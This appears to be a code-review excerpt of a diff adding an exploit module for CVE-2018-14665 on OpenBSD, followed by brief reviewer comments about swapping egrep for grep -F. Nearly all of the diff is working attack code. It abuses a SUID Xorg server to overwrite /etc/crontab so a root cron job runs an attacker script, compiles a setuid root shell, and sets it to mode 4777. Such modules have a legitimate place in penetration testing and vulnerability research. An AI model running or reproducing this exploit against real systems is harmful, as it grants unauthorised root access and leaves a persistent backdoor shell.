modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,171 @@
+         },
+      'References'     =>
+         [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+         ]
+    ))
+    register_options(
+      [
+        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
+        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
+        OptBool.new('BUILTIN', [ true, "Privesc in current session ",true ])
+      ])
+  end
+
+
+  def check
+    xorg_path = cmd_exec("which Xorg")
+    vprint_good "Xorg path found at #{xorg_path}"
+    if setuid? xorg_path
+      vprint_good "Xorg binary detected as SUID"
+      proc_list = []
+      proc_list = cmd_exec('ps ax')
+      if proc_list.include?("X")
+        vprint_warning("Xorg in process list, Can you stop it? ")
+        return CheckCode::Safe
+      else
+        vprint_good("Xorg does not appear running")
+        return CheckCode::Appears
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Appears
+       fail_with Failure::NotVulnerable, "Target not vulnerable"
+    end
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    # Defines path to script that will chmod the payload
+    builtin_only = "#{datastore['BUILTIN']}"
+    payload_path = "#{datastore['PAYLOAD_LOC']}"
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
+    payload_c = "#{pscript}.c"
+
+    # Universal stub for file crontab will run
+    cmd_exec "echo '#!/bin/sh' > #{pscript}"
+    cmd_exec "chmod +x #{pscript}"
+
+    # Upload for the text payloads
+    if builtin_only == 'false'
+      print_status 'Uploading your payload'
+      exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      cmd_exec "echo \"#{exp}\" >> #{pscript}"
+    else
+      print_good 'Attempting privesc within current session'
+      cmd_exec "echo cp /bin/sh #{payload_path} > #{pscript}"
+      cmd_exec "echo \'main(){setuid(0);setgid(0);system(\"/bin/sh\");}\' > #{payload_c}"
+      cmd_exec "echo gcc #{payload_c} -o #{payload_path} >> #{pscript}"
+      cmd_exec "echo chmod 4777 #{payload_path} >> #{pscript}"
+      register_file_for_cleanup payload_c
+      register_file_for_cleanup payload_path
+    end
+    register_file_for_cleanup pscript
+
+    # Exploit steps on crontab so backing it up
+    cmd_exec "cat /etc/crontab > #{pscript}.b"
+
+    # Actual exploit
+    print_status 'Trying /etc/crontab overwrite'
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    sleep 5
+    cmd_exec "pkill Xorg"
+    sleep 5
+    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
```

Comment:
Is `egrep` necessary?

Reply:
I mean, you could just use `grep` or `grep -F` or `fgrep`. Regex, especially ERE, seems like overkill.

Reply:
changed to grep -F